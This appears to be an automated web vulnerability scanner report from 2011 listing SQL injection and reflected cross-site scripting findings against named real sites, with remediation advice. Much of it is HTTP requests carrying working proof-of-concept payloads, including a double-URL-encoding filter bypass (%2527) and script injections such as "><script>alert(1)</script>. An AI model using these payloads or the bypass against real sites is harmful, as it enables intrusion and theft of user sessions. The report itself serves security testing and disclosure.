16.8. http://d3.zedo.com/jsc/d3/ff2.html

16.9. http://p.raasnet.com/partners/universal/in

16.10. http://sana.newsinc.com/sana.html

16.11. http://view.atdmt.com/ADO/iview/278612752/direct

16.12. http://view.atdmt.com/CNT/iview/334302974/direct/01/1829737

16.13. http://view.atdmt.com/CNT/iview/334302974/direct/01/4245069

16.14. http://view.atdmt.com/iaction/adoapn_AppNexusDemoActionTag_1

16.15. http://virtualgoods.bigdoor.com/media/html/gambit/about.html

16.16. http://www.onsugar.com/modules/facebook_connect/xd_receiver.php

17. Content type incorrectly stated

17.1. http://4qinvite.4q.iperceptions.com/1.aspx

17.2. http://ads.pointroll.com/PortalServe/

17.3. http://adserv.impactengine.com/www/kr/36/ui/b8/objembed.html/@@1315499800@@

17.4. http://amch.questionmarket.com/adsc/d879999/4/880134/randm.js

17.5. http://amch.questionmarket.com/adsc/d907755/101/908678/adscout.php

17.6. http://amch.questionmarket.com/adscgen/st.php

17.7. http://amch.questionmarket.com/adscgen/sta.php

17.8. http://bin.clearspring.com/at/v/1/button1.6.swf

17.9. http://bs.serving-sys.com/BurstingPipe/adServer.bs

17.10. http://class.savannahnow.com/classifieds-bin/classifieds

17.11. http://drupal.org/misc/favicon.ico

17.12. http://go.savannahnow.com/partner_json/search

17.13. http://imp.fetchback.com/serve/fb/adtag.js

17.14. http://intl.esperanto.mtvi.com/sitewide/scripts/widgets/geo/geoload.jhtml

17.15. http://intl.esperanto.mtvi.com/sitewide/scripts/widgets/geo/json/advisory.jhtml

17.16. http://intl.esperanto.mtvi.com/sitewide/scripts/widgets/geo/json/persistent.jhtml

17.17. http://metrics.impactengine.com/rest/reveal/129534/5011/Expand_Content

17.18. http://metrics.impactengine.com/rest/view/129534/5011/0

17.19. http://metrics.impactengine.com/rest/view/129534/5011/30

17.20. http://p.raasnet.com/partners/dfp

17.21. http://pglb.buzzfed.com/148250/91bc34b96eac101805574950b6644cc6

17.22. http://ps2.newsinc.com/Playlist/show/10557/4106/994.xml

17.23. http://s0.2mdn.net/2251996/Pixel_1x1.jpg

17.24. http://www.cargoh.com/sites/all/themes/cargoh/images/icons/fav_mail.gif

17.25. http://www.mtv.co.uk/files/favicon.ico

17.26. http://www.onsugar.com/favicon.ico

17.27. http://www.pdx.edu/sites/all/themes/pdx_home/favicon.ico

17.28. http://www.pdx.edu/sites/all/themes/pdx_primary/fonts/book/SquareSerif-Book-webfont.woff

17.29. http://www.popsugar.com/ajaxharness

17.30. http://www.popsugar.com/favicon.ico

17.31. http://www.symantec.com/connect/sites/default/themes/connect2/images/favicon.ico

18. Content type is not specified

18.1. http://ad.yieldmanager.com/st

18.2. http://ads.bluelithium.com/st



1. SQL injection
There are 3 instances of this issue:

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Remediation background

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already been defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:



1.1. http://ciphertex.com/content/product-comparison [SESSe7e1ce4917bcb7c6c1e7e1e807484f3c cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://ciphertex.com
Path:   /content/product-comparison

Issue detail

The SESSe7e1ce4917bcb7c6c1e7e1e807484f3c cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the SESSe7e1ce4917bcb7c6c1e7e1e807484f3c cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the SESSe7e1ce4917bcb7c6c1e7e1e807484f3c cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /content/product-comparison HTTP/1.1
Host: ciphertex.com
Proxy-Connection: keep-alive
Referer: http://www.ciphertex.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSe7e1ce4917bcb7c6c1e7e1e807484f3c=73a26afbd88192a18065e392787c8e3e%2527; __utma=187742778.1111443639.1315849319.1315849319.1315849319.1; __utmb=187742778.5.9.1315849453904; __utmc=187742778; __utmz=187742778.1315849319.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ciphertext%20data%20security

Response 1

HTTP/1.1 503 Service Unavailable
Date: Mon, 12 Sep 2011 12:45:27 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Cache-Control: max-age=1
Expires: Mon, 12 Sep 2011 12:45:28 GMT
Vary: Accept-Encoding
Content-Length: 2608
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>

...[SNIP]...
</em> error was: <em>
...[SNIP]...

Request 2

GET /content/product-comparison HTTP/1.1
Host: ciphertex.com
Proxy-Connection: keep-alive
Referer: http://www.ciphertex.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSe7e1ce4917bcb7c6c1e7e1e807484f3c=73a26afbd88192a18065e392787c8e3e%2527%2527; __utma=187742778.1111443639.1315849319.1315849319.1315849319.1; __utmb=187742778.5.9.1315849453904; __utmc=187742778; __utmz=187742778.1315849319.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ciphertext%20data%20security

Response 2

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 12:45:27 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Mon, 12 Sep 2011 12:45:27 GMT
Vary: Accept-Encoding
Content-Length: 58017
Connection: close
Content-Type: text/html; charset=utf-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">


<head>
<meta ht
...[SNIP]...

1.2. http://ciphertex.com/content/product-comparison [__utma cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://ciphertex.com
Path:   /content/product-comparison

Issue detail

The __utma cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utma cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the __utma cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /content/product-comparison HTTP/1.1
Host: ciphertex.com
Proxy-Connection: keep-alive
Referer: http://www.ciphertex.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSe7e1ce4917bcb7c6c1e7e1e807484f3c=73a26afbd88192a18065e392787c8e3e; __utma=187742778.1111443639.1315849319.1315849319.1315849319.1%2527; __utmb=187742778.5.9.1315849453904; __utmc=187742778; __utmz=187742778.1315849319.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ciphertext%20data%20security

Response 1

HTTP/1.1 503 Service Unavailable
Date: Mon, 12 Sep 2011 12:46:06 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Cache-Control: max-age=1
Expires: Mon, 12 Sep 2011 12:46:07 GMT
Vary: Accept-Encoding
Content-Length: 2608
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>

...[SNIP]...
</em> error was: <em>
...[SNIP]...

Request 2

GET /content/product-comparison HTTP/1.1
Host: ciphertex.com
Proxy-Connection: keep-alive
Referer: http://www.ciphertex.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSe7e1ce4917bcb7c6c1e7e1e807484f3c=73a26afbd88192a18065e392787c8e3e; __utma=187742778.1111443639.1315849319.1315849319.1315849319.1%2527%2527; __utmb=187742778.5.9.1315849453904; __utmc=187742778; __utmz=187742778.1315849319.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ciphertext%20data%20security

Response 2

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 12:46:06 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Mon, 12 Sep 2011 12:46:06 GMT
Vary: Accept-Encoding
Content-Length: 58017
Connection: close
Content-Type: text/html; charset=utf-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">


<head>
<meta ht
...[SNIP]...

1.3. http://www.ciphertex.com/themes/garland/minnelli/minnelli.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.ciphertex.com
Path:   /themes/garland/minnelli/minnelli.css

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /themes%2527/garland/minnelli/minnelli.css?0 HTTP/1.1
Host: www.ciphertex.com
Proxy-Connection: keep-alive
Referer: http://www.ciphertex.com/products/view/cx-ranger-ex
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSe7e1ce4917bcb7c6c1e7e1e807484f3c=73a26afbd88192a18065e392787c8e3e; has_js=1; __utma=187742778.1111443639.1315849319.1315849319.1315849319.1; __utmb=187742778.2.10.1315849319; __utmc=187742778; __utmz=187742778.1315849319.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ciphertext%20data%20security

Response 1

HTTP/1.1 503 Service Unavailable
Date: Mon, 12 Sep 2011 12:44:57 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Cache-Control: max-age=1
Expires: Mon, 12 Sep 2011 12:44:58 GMT
Vary: Accept-Encoding
Content-Length: 2608
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>

...[SNIP]...
</em> error was: <em>
...[SNIP]...

Request 2

GET /themes%2527%2527/garland/minnelli/minnelli.css?0 HTTP/1.1
Host: www.ciphertex.com
Proxy-Connection: keep-alive
Referer: http://www.ciphertex.com/products/view/cx-ranger-ex
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSe7e1ce4917bcb7c6c1e7e1e807484f3c=73a26afbd88192a18065e392787c8e3e; has_js=1; __utma=187742778.1111443639.1315849319.1315849319.1315849319.1; __utmb=187742778.2.10.1315849319; __utmc=187742778; __utmz=187742778.1315849319.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ciphertext%20data%20security

Response 2

HTTP/1.1 404 Not Found
Date: Mon, 12 Sep 2011 12:44:58 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Mon, 12 Sep 2011 12:44:58 GMT
Vary: Accept-Encoding
Content-Length: 9996
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>
...[SNIP]...

2. Cross-site scripting (reflected)
There are 145 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


2.1. http://4qinvite.4q.iperceptions.com/1.aspx [loc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://4qinvite.4q.iperceptions.com
Path:   /1.aspx

Issue detail

The value of the loc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a61f2'-alert(1)-'18bb0f0ae28 was submitted in the loc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /1.aspx?sdfc=db35e419-4469-64f48812-f81a-4e4c-930c-5aa18d636b5f&lID=1&loc=4Q-WEB2a61f2'-alert(1)-'18bb0f0ae28 HTTP/1.1
Host: 4qinvite.4q.iperceptions.com
Proxy-Connection: keep-alive
Referer: http://www.digitaldollhouse.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
X-Srv-By: IPS-INVITE01
P3P: policyref="/w3c/p3p.xml", CP="NOI NID ADM DEV PSA OUR IND UNI COM STA"
Date: Mon, 12 Sep 2011 12:50:24 GMT
Content-Length: 1296

var sID= '5432'; var sC= 'IPE5432';var rF='False'; var brow= 'Chrome'; var vers= '13'; var lID= '1'; var loc= '4Q-WEB2a61f2'-alert(1)-'18bb0f0ae28'; var ps='sdfc=db35e419-4469-64f48812-f81a-4e4c-930c-5aa18d636b5f&lID=1&loc=4Q-WEB2a61f2%27-alert(1)-%2718bb0f0ae28';var IPEspeed = 5;var _invite = 'ips-invite'; rn='5432';var sGA='';function setupGA(
...[SNIP]...

2.2. http://ad.yieldmanager.com/rw [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /rw

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b97c8"><script>alert(1)</script>99f052b9bda was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /rw?title=&qs=iframe3%3FmsUBAB26GADSD50AAAAAAMvWJgAAAAAAAgAAAAAAAAAAAP8AAAACCKz8LgAAAAAAnggAAAAAAAAG1TIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA2KRAAAAAAAAICAwAAAAAAGy%2EdJAYBFUAbL90kBgEVQAAAeoulitI%2EZmZmZmZmAUAAAPi53LjYPzMzMzMzMwdAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABbksInE%2DS2CpsKXXVhy0SGaDsCy0zxGJguLNV6AAAAAA%3D%3D%2C%2Chttp%253A%252F%252Fwww%2Enowpublic%2Ecom%252F%2CB%253D10%2526Z%253D0x0%2526%5Fsalt%253D1964679122%2526anmember%253D541%2526anprice%253D%2526r%253D1%2526s%253D1620509%2526y%253D29%2C7d9e50b4%2Ddd3d%2D11e0%2D90ef%2D78e7d161fe68&b97c8"><script>alert(1)</script>99f052b9bda=1 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://www.nowpublic.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 12:48:38 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: lifb=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Content-Length: 828
Content-Type: text/html
Age: 0
Proxy-Connection: close

<html><head><title></title></head><body style="margin-left:0%;margin-right:0%;margin-top:0%;margin-bottom:0%"><iframe allowtransparency="true" scrolling="no" marginwidth="0" marginheight="0" framebord
...[SNIP]...
hy0SGaDsCy0zxGJguLNV6AAAAAA==,,http%3A%2F%2Fwww.nowpublic.com%2F,B%3D10%26Z%3D0x0%26_salt%3D1964679122%26anmember%3D541%26anprice%3D%26r%3D1%26s%3D1620509%26y%3D29,7d9e50b4-dd3d-11e0-90ef-78e7d161fe68&b97c8"><script>alert(1)</script>99f052b9bda=1">
...[SNIP]...

2.3. http://ad.yieldmanager.com/rw [qs parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /rw

Issue detail

The value of the qs request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5fcde"><script>alert(1)</script>44f1c8c103a was submitted in the qs parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /rw?title=&qs=5fcde"><script>alert(1)</script>44f1c8c103a HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://www.nowpublic.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 12:48:38 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: lifb=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Content-Length: 334
Content-Type: text/html
Age: 0
Proxy-Connection: close

<html><head><title></title></head><body style="margin-left:0%;margin-right:0%;margin-top:0%;margin-bottom:0%"><iframe allowtransparency="true" scrolling="no" marginwidth="0" marginheight="0" frameborder="0" height="100%" width="100%" src="http://ad.yieldmanager.com/5fcde"><script>alert(1)</script>44f1c8c103a">
...[SNIP]...

2.4. http://ad.yieldmanager.com/rw [title parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /rw

Issue detail

The value of the title request parameter is copied into the HTML document as text between TITLE tags. The payload 64f21</title><script>alert(1)</script>64b9de015e6 was submitted in the title parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /rw?title=64f21</title><script>alert(1)</script>64b9de015e6&qs=iframe3%3FmsUBAB26GADSD50AAAAAAMvWJgAAAAAAAgAAAAAAAAAAAP8AAAACCKz8LgAAAAAAnggAAAAAAAAG1TIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA2KRAAAAAAAAICAwAAAAAAGy%2EdJAYBFUAbL90kBgEVQAAAeoulitI%2EZmZmZmZmAUAAAPi53LjYPzMzMzMzMwdAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABbksInE%2DS2CpsKXXVhy0SGaDsCy0zxGJguLNV6AAAAAA%3D%3D%2C%2Chttp%253A%252F%252Fwww%2Enowpublic%2Ecom%252F%2CB%253D10%2526Z%253D0x0%2526%5Fsalt%253D1964679122%2526anmember%253D541%2526anprice%253D%2526r%253D1%2526s%253D1620509%2526y%253D29%2C7d9e50b4%2Ddd3d%2D11e0%2D90ef%2D78e7d161fe68 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://www.nowpublic.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 12:48:37 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: lifb=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Content-Length: 831
Content-Type: text/html
Age: 0
Proxy-Connection: close

<html><head><title>64f21</title><script>alert(1)</script>64b9de015e6</title></head><body style="margin-left:0%;margin-right:0%;margin-top:0%;margin-bottom:0%"><iframe allowtransparency="true" scrollin
...[SNIP]...

2.5. http://ad.yieldmanager.com/st [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /st

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b6a5f"-alert(1)-"1c9c4bb1a71 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /st?anmember=541&anprice=&ad_type=pop&ad_size=0x0&section=1620509&banned_pop_types=29&pop_times=1&pop_frequency=86400&b6a5f"-alert(1)-"1c9c4bb1a71=1 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://www.nowpublic.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 12:48:40 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: lifb=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Cache-Control: no-store
Last-Modified: Mon, 12 Sep 2011 12:48:40 GMT
Pragma: no-cache
Content-Length: 4413
Age: 0
Proxy-Connection: close

/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=0;var rm_pop_times=0;var rm_pop_nofreqcap=0;var rm_passback=0;var rm_tag_type="";rm_pop_frequency = 86400; rm_pop_times = 1; rm_pop_id = 1620509; rm_tag_type = "pop"; rm_url = "http://ad.yieldmanager.com/imp?Z=0x0&anmember=541&anprice=&b6a5f"-alert(1)-"1c9c4bb1a71=1&y=29&s=1620509&_salt=192209607";var RM_POP_COOKIE_NAME='ym_pop_freq';var RM_INT_COOKIE_NAME='ym_int_freq';if(!window.rm_crex_data){rm_crex_data=new Array();}if(rm_passback==0){rm_pb_data=new Array()
...[SNIP]...

2.6. http://ads.bluelithium.com/st [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.bluelithium.com
Path:   /st

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fb233"-alert(1)-"19d71a463a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /st?ad_type=iframe&ad_size=1x1&section=2377409&fb233"-alert(1)-"19d71a463a=1 HTTP/1.1
Host: ads.bluelithium.com
